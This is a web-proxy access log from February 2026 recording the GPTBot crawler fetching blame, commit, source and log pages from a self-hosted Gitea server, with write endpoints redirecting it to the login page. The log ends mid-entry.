"https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest" [Client 74.7.227.38] [Length 42872] [Gzip 9.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" -[17/Feb/2026:16:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" -[17/Feb/2026:16:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" -[17/Feb/2026:16:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" -[17/Feb/2026:16:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11946] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" -[17/Feb/2026:16:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" -[17/Feb/2026:16:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" -[17/Feb/2026:16:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" -[17/Feb/2026:16:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11483] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" -[17/Feb/2026:16:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13976] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" -[17/Feb/2026:16:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16520] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16521] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15596] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" -[17/Feb/2026:16:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15596] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14256] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14867] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" -[17/Feb/2026:16:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14253] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10049] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:16:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10333] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 20593] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:16:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14463] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28506] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 25121] [Gzip 11.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 409948] [Gzip 15.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] 